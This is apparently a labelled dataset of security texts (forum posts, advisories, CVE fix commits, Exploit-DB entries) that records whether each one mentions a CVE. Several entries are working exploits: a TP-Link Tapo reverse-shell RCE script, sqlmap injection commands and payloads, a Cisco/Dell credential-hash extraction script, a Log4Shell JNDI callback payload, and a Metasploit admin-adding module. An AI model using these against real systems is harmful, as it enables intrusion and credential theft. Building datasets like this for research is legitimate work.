Network+ (or Cisco Networking Fundamentals\\CCNA) CompTIA Linux+ (or Linux Professional Institute’s LPI1 and LPI2) CompTIA Security+ CompTIA Pentest+ (or many others) I would follow the CompTIA path as the certs (as most do) need to be renewed every 3 years to stay valid, but taking another CompTIA cert renews all the earlier ones taken. Free Network+ training videos: https://www.youtube.com/playlist?list=PLG49S3nxzAnmpdmX7RoTOyuNJQAb-r-gd Free Security+ training videos: https://www.youtube.com/playlist?list=PLG49S3nxzAnkL2ulFS3132mOVKuzzBxA8 Free Pentest+ training videos: https://www.youtube.com/playlist?list=PLqM63j87R5p4olmWpzqaXMhEP2zEnQhPD", "source": "parrotsec", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f8cd3666fdca297651af", "text": "I tried to follow your directions, but I keep getting “Folder is empty” in the File Manager using Burp Suite Repeater Here is what I tried (Spoiler) I tried both move and copy, url encoded ‘<<<’ (%3C%3C%3C), used to=tmp and without tmp. I’m not sure what I’m doing wrong. Spoiler", "source": "hackthebox", "timestamp": "2023-10-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "477330373c75cc5dc1aa", "text": "Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure\n\n# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure\n# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos\n\n\n# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter\n# Discovered by Ken 's1ngular1ty' Pyle\n\n\n# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter\n# Discovered by Ken 's1ngular1ty' Pyle\n\n\nimport requests\nimport re\nimport hashlib\nimport sys\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nif len(sys.argv) < 3:\n print(\"Usage: python cve-2019-15993.py URL passwordfile\")\n sys.exit()\n\nurl = sys.argv[1]\nfile = sys.argv[2]\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef hash_value(value):\n \"\"\"Calculate the SHA1 hash of a value.\"\"\"\n sha1 = hashlib.sha1()\n sha1.update(value.encode('utf-8'))\n return sha1.hexdigest()\n\ndef userName_parser(text, start_delimiter, end_delimiter):\n results = []\n iteration = 0\n start = 0\n while start >= 0:\n start = text.find(start_delimiter, start)\n if start >= 0:\n start += len(start_delimiter)\n end = text.find(end_delimiter, start)\n if end >= 0:\n results.append(text[start:end])\n start = end + len(end_delimiter)\n\n iteration = iteration + 1\n return results\n\n# retrieve the web page\nresponse = requests.get(url, allow_redirects=False, verify=False)\n\n# Read in the values from the file\nwith open(file, 'r') as f:\n values = f.readlines()\n\nvalues = [value.strip() for value in values]\nhashes = {hash_value(value): value for value in values}\n\nif response.status_code == 302:\n print(\"Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\\n\")\n url = response.headers[\"Location\"] + \"config/device/adminusersetting\"\n response=requests.get(url, verify=False)\n\n if response.status_code == 200:\n print(\"[*] Successful request to URL:\", url + \"\\n\")\n content = response.text\n users_names = userName_parser(content,\"\",\"\")\n sha1_hashes = re.findall(r\"[a-fA-F\\d]{40}\", content)\n\n print(\"SHA1 Hashes found:\\n\")\n\n loops = 0\n while loops < len(sha1_hashes):\n print(\"Username: \" + str(users_names[loops]) + \"\\n\" + \"SHA1 Hash: \" + sha1_hashes[loops] + \"\\n\")\n\n\n for sha1_hash in sha1_hashes:\n if sha1_hash in hashes:\n print(\"Match:\", sha1_hash, hashes[sha1_hash])\n print(\"\\nTesting Credentials via API.\\n\\n\")\n payload = (sys.argv[1] + \"/System.xml?\" + \"action=login&\" + \"user=\" + users_names[loops] + \"&password=\" + hashes[sha1_hash])\n\n response_login = requests.get(payload, allow_redirects=False, verify=False)\n headers = response_login.headers\n if \"sessionID\" in headers:\n print(\"Username & Password for \" + str(users_names[loops]) + \" is correct.\\n\\nThe SessionID Token / Cookie is:\\n\")\n print(headers[\"sessionID\"])\n else:\n print(\"Unable to sign in.\")\n loops = loops + 1\n else:\n print(\"Host is not vulnerable:\", response.status_code)\n\n\n\n\n\n\n[cid:2b37ad37-9b26-416d-b485-c88954c0ab53]\n Ken Pyle\n M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+\n Main: 267-540-3337\n Direct: 484-498-8340\n Email: kp@cybir.com\n Website: www.cybir.com", "source": "exploitdb", "timestamp": "2023-04-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "882ce4afa288ee9e0cf9", "text": "Thank you everybody, this topic helped a lot. Another hint, there are 3 fields with = that could be used on the injection. Make sure to test all of them.", "source": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bfc560d9dab506149e99", "text": "Induced error (network denial) in sudo apt update/upgrade\n\nHey guys. I’ve just realized something, which could be of interest for the community and the developers. If I install, and then configure my ParrotSec instance in Latin America. It works perfectly. BUT, if I sudo apt get update and then sudo apt upgrade I obtain a warning related with a modification on the /etc/apt/sources.list (repository file). Whatever I choose to do, I have the same issue over and over again: Basically I loose my capacity to use ethernet. Just because I was curious. I reinstalled my version of ParrotSec through an USB Image that I always have with me. I can guarantee that the version has been the same through the time. But now, after I installed it in Europe IT WORKS! I’m not providing an explanation to this phenomena, but I’m just sharing with you guys the facts.", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "db7cf55bcaa1109a934f", "text": "If anyone has any issues try this, as you want what is listening on ipv4 only (0.0.0.0) which forces the daemon to listen on ipv4 only. netstat -luntp | grep “0.0.0.0” | grep -v “127.0.0” | grep “LISTEN” | wc -l", "source": "hackthebox", "timestamp": "2022-01-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4ce1cc9dfed337d3d996", "text": "Pdf-jpgs\n\nHi guys. Can everyone help me: Two images that look completely ordinary are pasted in the PDF file, and it is highly unlikely that these files are normal. find a flag in PDF file. flag format:flag{[A-Za-z_]} File: https://ctf.laocert.la/download?file_key=2ae22faf6141dcd80543c3b183a5c6b453294ad49726507f2c8bc20919ed4ebf&team_key=dd89c8b4f94a963a02b496fec932dbb83ecc66561284a4906fd9c8fdc3fcaf46", "source": "hackthebox", "timestamp": "2022-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "94876a7b1151963c936b", "text": "can someone tell me what is going on here,… I am new here and I want to learn ACH and buying of logs", "source": "hackthebox", "timestamp": "2023-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1930a63481f92b13d511", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-03-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7e13bb5459b74a837ce4", "text": "You have to check the denied characters. In your case the %7c (|) character is blacklisted, and you mustn’t use it, try with another type of injection", "source": "hackthebox", "timestamp": "2022-08-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "162a890c46bf8ac45839", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-8242, CVE-2018-8287, CVE-2018-8288, CVE-2018-8291, CVE-2018-8296, CVE-2018-8298.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d02ce4b2e4e369598679", "text": "Intern Record System v1.0 - SQL Injection (Unauthenticated)\n\n# Exploit Title: Intern Record System v1.0 - SQL Injection (Unauthenticated)\n# Date: 2022-06-09\n# Exploit Author: Hamdi Sevben\n# Vendor Homepage: https://code-projects.org/intern-record-system-in-php-with-source-code/\n# Software Link: https://download-media.code-projects.org/2020/03/Intern_Record_System_In_PHP_With_Source_Code.zip\n# Version: 1.0\n# Tested on: Windows 10 Pro + PHP 8.1.6, Apache 2.4.53\n# CVE: CVE-2022-40347\n# References:\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40347\nhttps://github.com/h4md153v63n/CVE-2022-40347_Intern-Record-System-phone-V1.0-SQL-Injection-Vulnerability-Unauthenticated\n\n------------------------------------------------------------------------------------\n\n1. Description:\n----------------------\n\nIntern Record System 1.0 allows SQL Injection via parameters 'phone', 'email', 'deptType' and 'name' in /intern/controller.php\nExploiting this issue could allow an attacker to compromise the application, access or modify data,\nor exploit latest vulnerabilities in the underlying database.\n\n\n2. Proof of Concept:\n----------------------\n\nIn sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.\nThen run SQLmap to extract the data from the database:\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"deptType\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"email\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=test&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"name\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=&email=&deptType=3&name=test\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\nsqlmap.py -u \"http://localhost/intern/controller.php\" -p \"phone\" --risk=\"3\" --level=\"3\" --method=\"POST\" --data=\"phone=test&email=&deptType=3&name=\" --user-agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\" --headers=\"Host:localhost\\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\\nAccept-Encoding:gzip, deflate\\nAccept-Language:en-us,en;q=0.5\\nCache-Control:no-cache\\nContent-Type:application/x-www-form-urlencoded\\nReferer:http://localhost/intern/\" --dbms=\"MySQL\" --batch --dbs -D department --dump\n\n\n3. Example payload:\n----------------------\n\n-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROU", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f77fefab6cb3f631d2cc", "text": "I’m stuck on the last one. Any help? I’ve already tried playing with the filters but i dont come up with anything new.", "source": "hackthebox", "timestamp": "2023-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "32d70fd1c63dbd0f1b7e", "text": "CVE: CVE-2021-46463\n\n[{'lang': 'en', 'value': 'njs through 0.7.1, used in NGINX, was discovered to contain a control flow hijack caused by a Type Confusion vulnerability in njs_promise_perform_then().'}]\n\nFix commit: Fixed type confusion bug while resolving promises.\n\nPreviously, the internal function njs_promise_perform_then() which\nimplements PerformPromiseThen() expects its first argument to always be\na promise instance. This assertion might be invalid because the\nfunctions corresponding to Promise.prototype.then() and\nPromise.resolve() incorrectly verified their arguments.\n\nSpecifically, the functions recognized their first argument as promise\nif it was an object which was an Promise or had Promise object in its\nprototype chain. The later condition is not correct because internal\nslots are not inherited according to the spec.\n\nThis closes #447 issue in Github.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4621e5c8bf723b5b7389", "text": "j0hnnyhax, the legend. LOL! en.wikipedia.org Johnny Long Johnny Long, otherwise known as \"j0hnny\" or \"j0hnnyhax\", is a computer security expert, author, and public speaker in the United States. Long is well known for his background in Google hacking, a process by which vulnerable servers on the Internet can be identified through specially constructed Google searches. He has gained fame as a prolific author and editor of numerous computer security books. Early in his career, in 1996, Long joined Computer Sciences Corporation and formed the corporation...", "source": "parrotsec", "timestamp": "2022-09-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7cdc6daa583f63fffe62", "text": "Instead of resorting to unethical and illegal activities, it is recommended to explore other options such as contacting the email service provider for assistance or attempting to reset the password using the account recovery options. It is always important to respect others' privacy and security, and refrain from engaging in any activities that may harm others or violate the law.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c623bf7cf847f6c35a8f", "text": "Issue while installing virtual box\n\nHi everyone, I m working under Blach Arch distribution and facing an issue during the server start. Actually, I executed the bellow commands : sudo pacman -S virtualbox virtualbox-guest-iso sudo gpasswd -a $USER vboxusers sudo modprobe vboxdrv yay -Syy yay -S virtualbox-ext-oracle sudo systemctl enable vboxweb.service But I get an error after executing the bellow command : sudo systemctl start vboxweb.service Error: Job for vboxweb.service failed because the control process exited with error code. See “systemctl status vboxweb.service” and “journalctl -xeu vboxweb.service” for details. Could you please tell me if it’s the right way to do? if yes, could you please help on this faced issue? Many thanks for your help. Regards,", "source": "hackersploit", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1b799567f1f5a6d1ec4a", "text": "Liferay Portal and Liferay DXP Vulnerable to XSS via the OAuth2ProviderApplicationRedirect Class\n\n[Severity: CRITICAL]\n\nMultiple reflected cross-site scripting (XSS) vulnerabilities in the Plugin for OAuth 2.0 module's OAuth2ProviderApplicationRedirect class before 4.0.51 from Liferay Portal (7.4.3.41 through 7.4.3.89), and Liferay DXP 7.4 update 41 through update 89 allow remote attackers to inject arbitrary web script or HTML via the (1) code, or (2) error parameter. This issue is caused by an incomplete fix in CVE-2023-33941.", "source": "github_advisory", "timestamp": "2023-10-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3e85a96bc32068545826", "text": "TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)\n\n# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)\n# Date: 02/11/2022\n# Exploit Author: hacefresko\n# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/\n# Version: 1.1.15 and below\n# Tested on: 1.1.11, 1.1.14 and 1.1.15\n# CVE : CVE-2021-4045\n\n# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce\n\nimport requests, urllib3, sys, threading, os\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nPORT = 1337\nREVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'\nNC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)\n\nif len(sys.argv) < 3:\n print(\"Usage: python3 pwnTapo.py \")\n exit()\n\nvictim = sys.argv[1]\nattacker = sys.argv[2]\n\nprint(\"[+] Listening on %d\" % PORT)\nt = threading.Thread(target=os.system, args=(NC_COMMAND,))\nt.start()\n\nprint(\"[+] Serving payload to %s\\n\" % victim)\nurl = \"https://\" + victim + \":443/\"\njson = {\"method\": \"setLanguage\", \"params\": {\"payload\": \"';\" + REVERSE_SHELL % (attacker, PORT) + \";'\"}}\nrequests.post(url, json=json, verify=False)", "source": "exploitdb", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d90c8333d75c6692e7b3", "text": "CVE: CVE-2022-0579\n\n[{'lang': 'en', 'value': 'Improper Privilege Management in Packagist snipe/snipe-it prior to 5.3.9.'}]\n\nFix commit: Merge pull request #10665 from snipe/fixes/adds_gate_to_supplier_view\n\nAdds gate to supplier", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a86a2e49ae9baba7cedc", "text": "[Command Injection - Generic] LOGJ4 VUlnerability [HtUS]\n\n**Description:**\nHi team,\n\nlog4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable\n\n**Impact**\n\nRCE\n\n**System Host(s)**\n\n██████\n\n**Affected Product(s) and Version(s)**\n\n**CVE Numbers**\n\nCVE-2021-44228\n\n**Steps to Reproduce**\n\n1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n2. paste the poc code on parameter\n3. Then burp collaborator received reverse ping back\nPhotos below\n\n**POC CODE**\n${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n\n**Suggested Mitigation/Remediation Actions**\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Impact\n\nSuccessful attack leads Arbitary Code Execution on the application", "source": "hackerone", "timestamp": "2022-11-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "85b72eb6109303c1c16b", "text": "CVE: CVE-2022-2874\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0224.'}]\n\nFix commit: patch 9.0.0224: Using NULL pointer when skipping compiled code\n\nProblem: Using NULL pointer when skipping compiled code.\nSolution: Check for skipping.", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c805f24dbe6313d55fe9", "text": "thank you to everyone who contributed in providing tips you all were very helpful. my piece of advice would try and get an error in your burp requests that gives you an idea of what commands are being ran in what syntax while messing around with the different feilds of injection. once youve got the syntax then all you need to do is bypass filters and find the proper payload.", "source": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5754d57a7dde5e34a689", "text": "I managed to solve this skill assesement, but I don’t understand why Like, I get the server is not blacklisting the “.”, but why the “” which basically returns a “.” don’t give the same result? I tested both commands on my terminal, and both command produces the same final result (&cat /flag.txt) Can someone clarify to me why? Thanks!", "source": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5ca1cb2bb3a767888dd3", "text": "SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains malware)\n\n846×558 125 KB Video: Download: HACKING CRACKING SECURITY SEO MARKETING MMO SQLI Dumper v.10.4 Full Clean + Video (All other sources are fake contains... https://vimeo.com/746983244 Download Here VirusTotal Password Unrar is 1 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackersploit", "timestamp": "2022-09-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7f1d46e90f21dacf9593", "text": "CVE: CVE-2021-20257\n\n[{'lang': 'en', 'value': 'An infinite loop flaw was found in the e1000 NIC emulator of the QEMU. This issue occurs while processing transmits (tx) descriptors in process_tx_desc if various descriptor fields are initialized with invalid values. This flaw allows a guest to consume CPU cycles on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability.'}]\n\nFix commit: e1000: fail early for evil descriptor\n\nDuring procss_tx_desc(), driver can try to chain data descriptor with\nlegacy descriptor, when will lead underflow for the following\ncalculation in process_tx_desc() for bytes:\n\n if (tp->size + bytes > msh)\n bytes = msh - tp->size;\n\nThis will lead a infinite loop. So check and fail early if tp->size if\ngreater or equal to msh.\n\nReported-by: Alexander Bulekov \nReported-by: Cheolwoo Myung \nReported-by: Ruhr-University Bochum \nCc: Prasad J Pandit \nCc: qemu-stable@nongnu.org\nSigned-off-by: Jason Wang ", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b2b3ab31adfe61d6db5b", "text": "Bundled libwebp in pywebp vulnerable\n\n[Severity: HIGH]\n\n### Impact\npywebp versions before v0.3.0 bundled libwebp binaries in wheels that are vulnerable to CVE-2023-4863. The vulnerability was a heap buffer overflow which allowed a remote attacker to perform an out of bounds memory write.\n\n### Patches\nThe problem has been patched upstream in libwebp 1.3.2.\npywebp was updated to bundle a patched version of libwebp in v0.3.0.\n\n### Workarounds\nNo known workarounds without upgrading.\n\n### References\n- https://www.rezilion.com/blog/rezilion-researchers-uncover-new-details-on-severity-of-google-chrome-zero-day-vulnerability-cve-2023-4863/\n- https://nvd.nist.gov/vuln/detail/CVE-2023-4863\n", "source": "github_advisory", "timestamp": "2023-10-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "de3fa82147bdd939d11a", "text": "never mind, I’ve found it. I think I mistyped on my first attempt", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2a22b51c9bb109e4d13b", "text": ".NET Denial of Service vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-29331: .NET Denial of Service vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET when processing X.509 certificates that may result in Denial of Service. \n\nDetails: [KB5025823 ](https://support.microsoft.com/kb/5025823)\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/257\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0 application running on .NET 7.0.5 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.16 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 7.0.0, < 7.0.1 | 7.0.3\n[System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 7.0.0, < 7.0.1 | 7.0.2\n[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, < 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, < 7.0.5 | 7.0.7\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.Windows.Compatibility](https://www.nuget.org/packages/Microsoft.Windows.Compatibility) | >= 6.0.0, < 6.0.4 | 6.0.6\n[System.Security.Cryptography.Pkcs](https://www.nuget.org/packages/System.Security.Cryptography.Pkcs) | >= 6.0.0, < 6.0.2 | 6.0.3\n[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 6.0.0, < 6.0.16 | 6.0.18\n[Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Micros", "source": "github_advisory", "timestamp": "2023-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "00ce72bf58d33357b379", "text": "Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',\n 'Description' => %q(\n This module exploits an authentication bypass in Servisnet Tessa, triggered by add new sysadmin user.\n\t\tThe app.js is publicly available which acts as the backend of the application.\n By exposing a default value for the \"Authorization\" HTTP header,\n it is possible to make unauthenticated requests to some areas of the application.\n Even MQTT(Message Queuing Telemetry Transport) protocol connection information can be obtained with this method.\n A new admin user can be added to the database with this header obtained in the source code.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22831' ],\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # for Origin and Referer headers\n\n def app_path\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /baseURL/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\n print_status(\"baseURL: #{base_url}\")\n return base_url\n else\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\n end\n end\n\n def add_user\n token = auth_bypass\n newuser = Rex::Text.rand_text_alpha_lower(8)\n id = Rex::Text.rand_text_numeric(4)\n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, 